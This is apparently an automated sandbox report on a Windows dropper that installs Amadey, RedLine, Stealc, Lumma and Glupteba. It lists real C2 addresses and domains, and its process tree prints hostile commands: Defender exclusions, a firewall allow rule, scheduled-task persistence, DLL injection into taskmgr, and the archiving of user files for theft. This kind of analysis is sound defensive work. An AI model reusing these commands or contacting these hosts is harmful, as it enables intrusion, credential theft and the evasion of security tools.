Analysis

  • max time kernel
    98s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240412-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-04-2024 03:28

General

  • Target

    f00f2b00fc3b996c228cda8c90a30b6539421768c0ba874c3ad1b73af48354ce.exe

  • Size

    1.8MB

  • MD5

    963b56254d6c8875cf0652a7ab236a19

  • SHA1

    d5097cc9fcc9ca4fa15916a60e79219501b38c41

  • SHA256

    f00f2b00fc3b996c228cda8c90a30b6539421768c0ba874c3ad1b73af48354ce

  • SHA512

    a1ff8e164d53071fe332a284e5fafe3911c9f039d9e673d081e9a99522631cfe704094d4bf39d439937493e38e918f974a60f8995a96530ad7fc93b000bf0609

  • SSDEEP

    24576:h/v0SR4nYmc8vLDsN8fo0sE4qEJv14CEH7jYkfTM5seR4t7L5/EaNJx7Z6wW4R0V:hkzjfoKEa77EYJLtKiMt1JQRHAhTj

Malware Config

Extracted

Family

amadey

Version

4.17

C2

http://193.233.132.167

Attributes
  • install_dir

    4d0ab15804

  • install_file

    chrosha.exe

  • strings_key

    1a9519d7b465e1f4880fa09a6162d768

  • url_paths

    /enigma/index.php

rc4.plain

Extracted

Family

redline

Botnet

@CLOUDYTTEAM

C2

185.172.128.33:8970

Extracted

Family

redline

Botnet

Test1234

C2

185.215.113.67:26260

Extracted

Family

stealc

C2

http://52.143.157.84

Attributes
  • url_path

    /c73eed764cc59dcb.php

Extracted

Family

lumma

C2

https://affordcharmcropwo.shop/api

https://cleartotalfisherwo.shop/api

https://worryfillvolcawoi.shop/api

https://enthusiasimtitleow.shop/api

https://dismissalcylinderhostw.shop/api

https://diskretainvigorousiw.shop/api

https://communicationgenerwo.shop/api

https://pillowbrocccolipe.shop/api

https://productivelookewr.shop/api

https://tolerateilusidjukl.shop/api

https://shatterbreathepsw.shop/api

https://shortsvelventysjo.shop/api

https://incredibleextedwj.shop/api

https://alcojoldwograpciw.shop/api

https://liabilitynighstjsko.shop/api

https://demonstationfukewko.shop/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detect ZGRat V1 4 IoCs
  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 5 IoCs
  • Lumma Stealer

    An infostealer written in C++ first seen in August 2022.

  • Modifies firewall policy service 2 TTPs 1 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 6 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 3 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Stops running service(s) 3 TTPs
  • Checks BIOS information in registry 2 TTPs 7 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 30 IoCs
  • Identifies Wine through registry keys 2 TTPs 2 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 11 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 4 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 3 IoCs
  • Enumerates connected drives 3 TTPs 4 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 10 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe 2 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 5 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 7 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 47 IoCs
  • Suspicious use of AdjustPrivilegeToken 36 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f00f2b00fc3b996c228cda8c90a30b6539421768c0ba874c3ad1b73af48354ce.exe
    "C:\Users\Admin\AppData\Local\Temp\f00f2b00fc3b996c228cda8c90a30b6539421768c0ba874c3ad1b73af48354ce.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    PID:1908
  • C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe
    C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Executes dropped EXE
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:5020
    • C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe
      "C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious use of WriteProcessMemory
      PID:808
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        3⤵
          PID:3152
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 808 -s 868
          3⤵
          • Program crash
          PID:404
      • C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe
        "C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:3384
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          3⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:3940
          • C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
            "C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"
            4⤵
            • Executes dropped EXE
            • Modifies system certificate store
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2252
          • C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
            "C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3320
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
            4⤵
              PID:4672
              • C:\Windows\SysWOW64\choice.exe
                choice /C Y /N /D Y /T 3
                5⤵
                  PID:2476
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 3384 -s 332
              3⤵
              • Program crash
              PID:516
          • C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe
            "C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe"
            2⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:4728
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              3⤵
                PID:2384
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4728 -s 356
                3⤵
                • Program crash
                PID:4904
            • C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
              "C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe"
              2⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:4256
              • C:\Windows\SysWOW64\schtasks.exe
                "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe" /F
                3⤵
                • Creates scheduled task(s)
                PID:5084
            • C:\Windows\SysWOW64\rundll32.exe
              "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
              2⤵
              • Loads dropped DLL
              PID:4204
              • C:\Windows\system32\rundll32.exe
                "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
                3⤵
                • Loads dropped DLL
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:4640
                • C:\Windows\system32\netsh.exe
                  netsh wlan show profiles
                  4⤵
                    PID:996
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\084619521222_Desktop.zip' -CompressionLevel Optimal
                    4⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4772
              • C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe
                "C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe"
                2⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:312
              • C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe
                "C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe"
                2⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:2268
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  3⤵
                  • Loads dropped DLL
                  • Checks processor information in registry
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2008
              • C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe
                "C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe"
                2⤵
                • UAC bypass
                • Windows security bypass
                • Checks computer location settings
                • Executes dropped EXE
                • Windows security modification
                • Checks whether UAC is enabled
                • Suspicious use of SetThreadContext
                • Suspicious use of AdjustPrivilegeToken
                • System policy modification
                PID:2436
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\sj13muwb\sj13muwb.cmdline"
                  3⤵
                    PID:4888
                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5A6F.tmp" "c:\Users\Admin\AppData\Local\Temp\sj13muwb\CSCBE9B1E082EB84A79BF49611B7B1219D.TMP"
                      4⤵
                        PID:4524
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe" -Force
                      3⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:5016
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
                      3⤵
                        PID:3644
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
                        3⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4448
                        • C:\Users\Admin\Pictures\bwncID4JdPneF18WVPw7vpnT.exe
                          "C:\Users\Admin\Pictures\bwncID4JdPneF18WVPw7vpnT.exe"
                          4⤵
                          • Executes dropped EXE
                          PID:1076
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -nologo -noprofile
                            5⤵
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1172
                          • C:\Users\Admin\Pictures\bwncID4JdPneF18WVPw7vpnT.exe
                            "C:\Users\Admin\Pictures\bwncID4JdPneF18WVPw7vpnT.exe"
                            5⤵
                              PID:5376
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell -nologo -noprofile
                                6⤵
                                  PID:2068
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                                  6⤵
                                    PID:3972
                                    • C:\Windows\system32\netsh.exe
                                      netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                      7⤵
                                      • Modifies Windows Firewall
                                      PID:4672
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -nologo -noprofile
                                    6⤵
                                      PID:1048
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -nologo -noprofile
                                      6⤵
                                        PID:4416
                                  • C:\Users\Admin\Pictures\53juduXJrqmxXRTYnYgiIEbB.exe
                                    "C:\Users\Admin\Pictures\53juduXJrqmxXRTYnYgiIEbB.exe"
                                    4⤵
                                    • Executes dropped EXE
                                    PID:2700
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -nologo -noprofile
                                      5⤵
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2272
                                    • C:\Users\Admin\Pictures\53juduXJrqmxXRTYnYgiIEbB.exe
                                      "C:\Users\Admin\Pictures\53juduXJrqmxXRTYnYgiIEbB.exe"
                                      5⤵
                                        PID:6004
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -nologo -noprofile
                                          6⤵
                                            PID:4660
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                                            6⤵
                                              PID:3688
                                              • C:\Windows\system32\netsh.exe
                                                netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                                7⤵
                                                • Modifies Windows Firewall
                                                PID:5228
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -nologo -noprofile
                                              6⤵
                                                PID:3932
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -nologo -noprofile
                                                6⤵
                                                  PID:4536
                                                • C:\Windows\rss\csrss.exe
                                                  C:\Windows\rss\csrss.exe
                                                  6⤵
                                                    PID:1916
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -nologo -noprofile
                                                      7⤵
                                                        PID:5012
                                                      • C:\Windows\SYSTEM32\schtasks.exe
                                                        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                                        7⤵
                                                        • Creates scheduled task(s)
                                                        PID:868
                                                      • C:\Windows\SYSTEM32\schtasks.exe
                                                        schtasks /delete /tn ScheduledUpdate /f
                                                        7⤵
                                                          PID:3724
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -nologo -noprofile
                                                          7⤵
                                                            PID:5104
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -nologo -noprofile
                                                            7⤵
                                                              PID:4240
                                                            • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                                                              C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                                                              7⤵
                                                                PID:6056
                                                              • C:\Windows\SYSTEM32\schtasks.exe
                                                                schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                                                7⤵
                                                                • Creates scheduled task(s)
                                                                PID:3140
                                                        • C:\Users\Admin\Pictures\GHl5gqSfnKgZD51SCNH9ahho.exe
                                                          "C:\Users\Admin\Pictures\GHl5gqSfnKgZD51SCNH9ahho.exe"
                                                          4⤵
                                                          • Checks computer location settings
                                                          • Executes dropped EXE
                                                          PID:3560
                                                          • C:\Users\Admin\AppData\Local\Temp\u2qw.0.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\u2qw.0.exe"
                                                            5⤵
                                                            • Executes dropped EXE
                                                            PID:5384
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5384 -s 1012
                                                              6⤵
                                                              • Program crash
                                                              PID:5860
                                                          • C:\Users\Admin\AppData\Local\Temp\Qg_Appv5.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\Qg_Appv5.exe"
                                                            5⤵
                                                              PID:4544
                                                              • C:\Users\Admin\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe
                                                                C:\Users\Admin\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe
                                                                6⤵
                                                                  PID:5032
                                                                  • C:\Users\Admin\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe
                                                                    C:\Users\Admin\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe
                                                                    7⤵
                                                                      PID:4640
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        C:\Windows\SysWOW64\cmd.exe
                                                                        8⤵
                                                                          PID:1316
                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                            C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                            9⤵
                                                                              PID:840
                                                                    • C:\Users\Admin\AppData\Local\Temp\u2qw.1.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\u2qw.1.exe"
                                                                      5⤵
                                                                        PID:2392
                                                                        • C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
                                                                          6⤵
                                                                            PID:3600
                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3560 -s 1156
                                                                          5⤵
                                                                          • Program crash
                                                                          PID:5176
                                                                      • C:\Users\Admin\Pictures\3Wtha12Qwuo72fN0BnEW46Wt.exe
                                                                        "C:\Users\Admin\Pictures\3Wtha12Qwuo72fN0BnEW46Wt.exe"
                                                                        4⤵
                                                                        • Modifies firewall policy service
                                                                        • Windows security bypass
                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                        • Checks BIOS information in registry
                                                                        • Executes dropped EXE
                                                                        • Windows security modification
                                                                        • Checks whether UAC is enabled
                                                                        • Drops file in System32 directory
                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                        PID:412
                                                                      • C:\Users\Admin\Pictures\gVRRUs0Wn0lNGqvrAIQI6m2S.exe
                                                                        "C:\Users\Admin\Pictures\gVRRUs0Wn0lNGqvrAIQI6m2S.exe"
                                                                        4⤵
                                                                        • Executes dropped EXE
                                                                        PID:1192
                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS7990.tmp\Install.exe
                                                                          .\Install.exe /nxdidQZJ "385118" /S
                                                                          5⤵
                                                                          • Checks BIOS information in registry
                                                                          • Checks computer location settings
                                                                          • Executes dropped EXE
                                                                          • Enumerates system info in registry
                                                                          PID:1632
                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                            "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                                            6⤵
                                                                              PID:5760
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                7⤵
                                                                                  PID:5996
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                    8⤵
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:5196
                                                                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                      "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                      9⤵
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:5756
                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 03:30:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\ELkipDb.exe\" em /xmsite_idujV 385118 /S" /V1 /F
                                                                                6⤵
                                                                                • Drops file in Windows directory
                                                                                • Creates scheduled task(s)
                                                                                PID:5368
                                                                          • C:\Users\Admin\Pictures\f98Zu3HZiaJsMbyhLqTVLyPc.exe
                                                                            "C:\Users\Admin\Pictures\f98Zu3HZiaJsMbyhLqTVLyPc.exe" --silent --allusers=0
                                                                            4⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Enumerates connected drives
                                                                            PID:5204
                                                                            • C:\Users\Admin\Pictures\f98Zu3HZiaJsMbyhLqTVLyPc.exe
                                                                              C:\Users\Admin\Pictures\f98Zu3HZiaJsMbyhLqTVLyPc.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.59 --initial-client-data=0x298,0x29c,0x2a0,0x274,0x2a4,0x6ba6e1d0,0x6ba6e1dc,0x6ba6e1e8
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              PID:5244
                                                                            • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\f98Zu3HZiaJsMbyhLqTVLyPc.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\f98Zu3HZiaJsMbyhLqTVLyPc.exe" --version
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              PID:5360
                                                                            • C:\Users\Admin\Pictures\f98Zu3HZiaJsMbyhLqTVLyPc.exe
                                                                              "C:\Users\Admin\Pictures\f98Zu3HZiaJsMbyhLqTVLyPc.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=5204 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240424032931" --session-guid=152b2369-4af8-4786-b30e-2775c2be3b89 --server-tracking-blob="YWYxZWVkZDVjOTE3OGEzNDY0NzlmYmIxMjE4ODc0NTNhNzExOGQ2ZTc3ZjhkYjI0YzEzOTRjZDU4MGQ0NjZkMDp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N19fNDU2Iiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTAiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzEzOTI5MzY0LjI5MzMiLCJ1dG0iOnsiY2FtcGFpZ24iOiI3NjdfXzQ1NiIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6Im1rdCJ9LCJ1dWlkIjoiYzQyOGFjYjktMWYxOC00ZjI4LWE2MmMtZTQ0YmI0ZWUyYjdkIn0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=6004000000000000
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Enumerates connected drives
                                                                              PID:5472
                                                                              • C:\Users\Admin\Pictures\f98Zu3HZiaJsMbyhLqTVLyPc.exe
                                                                                C:\Users\Admin\Pictures\f98Zu3HZiaJsMbyhLqTVLyPc.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.59 --initial-client-data=0x2a4,0x2a8,0x2ac,0x274,0x2b0,0x6b0ee1d0,0x6b0ee1dc,0x6b0ee1e8
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                • Loads dropped DLL
                                                                                PID:5580
                                                                            • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404240329311\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404240329311\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"
                                                                              5⤵
                                                                                PID:5412
                                                                              • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404240329311\assistant\assistant_installer.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404240329311\assistant\assistant_installer.exe" --version
                                                                                5⤵
                                                                                  PID:5916
                                                                                  • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404240329311\assistant\assistant_installer.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404240329311\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x356038,0x356044,0x356050
                                                                                    6⤵
                                                                                      PID:3216
                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
                                                                                3⤵
                                                                                  PID:1896
